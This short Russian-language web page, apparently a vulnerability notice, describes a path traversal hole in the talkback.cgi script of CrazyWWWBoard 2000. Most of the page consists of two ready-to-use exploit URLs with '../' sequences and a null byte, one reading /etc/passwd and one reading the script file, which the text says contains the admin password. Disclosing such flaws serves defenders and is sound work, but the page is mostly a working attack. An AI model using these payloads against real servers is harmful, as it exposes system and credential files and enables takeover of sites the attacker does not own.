• Партнер

  • Тalkback.cgi (CrazyWWWBoard 2000) в
    UNIX системах позволяет просматривать любой
    файл на сервере. Следующий URL покажет
    например /etc/passwd (уберите ненужные пробелы
    ):

    http://www.VULNERABLE-HOST.com/cgi- bin/talkback.cgi?article=
    ../../../../../../../../etc/passwd%00 &action=view&matchview=1

    Такая команда покажет
    сам talkback.cgi, в котором, кстати, покоится и
    пароль админа:

    http://www.VULNERABLE-HOST.com/cgi- bin/talkback.cgi?article=
    ../cgi-bin/talkback.cgi%00 &action=view&matchview=1

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии